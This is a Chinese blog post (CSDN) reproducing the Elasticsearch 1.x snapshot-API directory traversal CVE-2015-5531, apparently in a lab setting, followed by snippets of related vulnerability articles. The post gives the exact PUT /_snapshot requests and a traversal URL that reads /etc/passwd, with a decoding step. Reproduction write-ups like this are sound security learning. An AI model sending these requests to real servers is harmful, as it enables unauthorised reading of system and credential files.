ElasticSearch目录穿越(CVE-2015-5531)

已于 2024-01-16 10:52:56 修改
阅读量405 收藏 8
点赞数 9
文章标签: elasticsearch 大数据 搜索引擎
于 2024-01-16 10:52:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135619060
版权
本文描述了Elasticsearch1.5.1版本中的一个未经配置的安全漏洞,攻击者可通过恶意请求访问敏感数据。复现步骤包括利用burp工具修改请求创建仓库和快照,最终解码ASCII码获取敏感文件。建议用户及时升级到最新版本或打补丁以修复这一问题。
摘要由CSDN通过智能技术生成

漏洞描述:

Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。Elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.通过burp抓取该页面的包

3.修改get请求,新建一个仓库

PUT /_snapshot/test HTTP/1.1

{

    "type": "fs",

    "settings": {

        "location": "/usr/share/elasticsearch/repo/test"

    }

}

4.接着修改请求,新建一个快照

PUT /_snapshot/test2 HTTP/1.1

{

"type": "fs",

"settings": {

"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"

}

}

5.使用以下URL查看passwd文档,返回的值为ASCII码,需要解码

http://ip:port//_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

6.F12打开开发者模式,在控制台中输入以下内容对ASCII码进行解码

String.fromCharCode(ASCII码)

借此漏洞,可以访问攻击者想要的敏感数据,包括配置文件、日志、源代码等信息,更加方便攻击者对网站进行渗透。

修复建议:

  1. 打补丁。
  2. 升级版本。
慕筱蚺
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
实验室:用于安全性分析的漏洞实验室
02-05
名称描述CVE-2015-5531 1.6.1之前的Elasticsearch中的目录遍历漏洞允许远程攻击者通过与快照API调用相关的未指定向量读取任意文件。 CVE-2016-1909 5.0.12之前的Fortinet FortiAnalyzer和5.2.5之前的5.2.x; 3.3.3...
ElasticSearch漏洞复现
qq_63980959的博客
05-19 2599
Elasticsearch 是一个非常强大的搜索引擎。它目前被广泛地使用于各个 IT 公司。Elasticsearch 是由 Elastic 公司创建。它的代码位于 GitHub - elastic/elasticsearch: Free and Open, Distributed, RESTful Search Engine。Elasticsearch 是一个分布式、免费和开放的搜索和分析引擎,适用于所有类型的数据,包括文本、数字、地理空间、结构化和非结构化数据。
CVE-2015-5531 Elasticsearch 目录遍历漏洞
weixin_51387754的博客
11-18 3027
漏洞简介 漏洞类型:路径遍历 漏洞影响版本:1.0.0 – 1.6.0 攻击路径:远程 漏洞产生原因:源于程序没有充分过滤用户提交的输入,远程攻击者可借助目录遍历字符‘…’利用该漏洞访问包含敏感信息的任意文件。 先说说elasticsearch 的备份与快照功能 漏洞利用需要涉及到elasticsearch的备份功能,elasticsearch 提供了一套强大的API,使得elasticsearch备份非常简单 要实现备份功能。前提是elasticsearch 进程对备份目录有写入权限,一般来说我们可以利用
CVE-2015-5531(目录遍历漏洞)
浅笑996的博客
11-26 1294
vulhub漏洞环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-5531/ sudo docker-compose up 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch...
ElasticSearch 目录穿越漏洞(CVE-2015-5531)
EC_Carrot的博客
05-31 2049
漏洞背景 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 Elasticsearch 1.6.1之前版本中存在目录遍历漏洞。远程攻击者可借助快照的API调用利用该漏洞读取任意文件。 影响版本 1.6.1以下 Tip: elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.
搭建elasticsearch服务器
分享程序猿的内心世界
10-18 675
1 lucene简介 1.1 什么是lucene Lucene是一个全文搜索框架,而不是应用产品。因此它并不像http://www.baidu.com/或者google Desktop那么拿来就能用,它只是提供了一种工具让你能实现这些产品。 Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。Ela.
elasticsearch-analysis-ik-8.11.0
最新发布
11-27
1. 安装:将`elasticsearch-analysis-ik-8.11.0.jar`文件放入Elasticsearch的`plugins`目录下,并确保所有依赖项(如`httpclient-4.5.13.jar`、`commons-codec-1.11.jar`等)也已正确放置。 2. 配置:在Elastic...
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
elasticsearch-analysis-dynamic-synonym-7.6.2
08-17
1. **下载与安装**:将`elasticsearch-analysis-dynamic-synonym-7.6.2.jar`文件复制到ES的`plugins`目录下,然后重启ES服务,系统会自动识别并加载插件。 2. **配置文件**:创建`synonyms.txt`文件,包含同义词...
ElasticSearch 目录穿越漏洞(CVE-2015-3337)
黑白的博客
12-13 2218
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 复现过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
ElasticSearch漏洞合集及其POC合集
weixin_46626737的博客
08-21 506
2.ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)5.Elasticsearch写入webshell漏洞(WooYun-2015-110216)3.ElasticSearch 目录穿越漏洞(CVE-2015-3337)4.ElasticSearch 目录穿越漏洞(CVE-2015-5531)3)漏洞版本:
ElasticSearch是什么?Lucene是什么?
jj89929665的博客
02-02 757
ElasticSearch 分布式全文检索引擎 Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口(请求分类 get post delete put)。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。Elasticsearch用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。官方客户端在Java、.NET(C#)、PHP、Python
Elasticsearch漏洞汇总比较全
weixin_50464560的博客
08-23 5333
本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。
ElasticSearch 目录穿越漏洞 CVE-2015-5531 漏洞复现
ADummy的博客
02-24 776
ElasticSearch 目录穿越漏洞(CVE-2015-5531) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 说明: elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。 jre版本:open
Elasticsearch 常见漏洞复现合集
寒星的博客
05-27 9121
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
CVE-2015-4852 java 反序列化漏洞--weblogic补丁
热门推荐
水滴石穿
01-04 2万+
    CVE-2015-4852 Patch Availability Document for Oracle WebLogic Server Component of Oracle Fusion Middleware (Doc ID 2075927.1) To Bottom APPLIES TO: PeopleSoft Enterprise PT Peo...
volume-005es18017-i-2015.csv
09-28
volume-005es18017-i-2015.csv是一个文件的名称,该文件是以CSV格式保存的数据文件。CSV即逗号分隔值,是一种常用的文件格式,用于存储结构化数据。 这个文件名中的“volume-005es18017-i-2015”可以解读为该文件是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值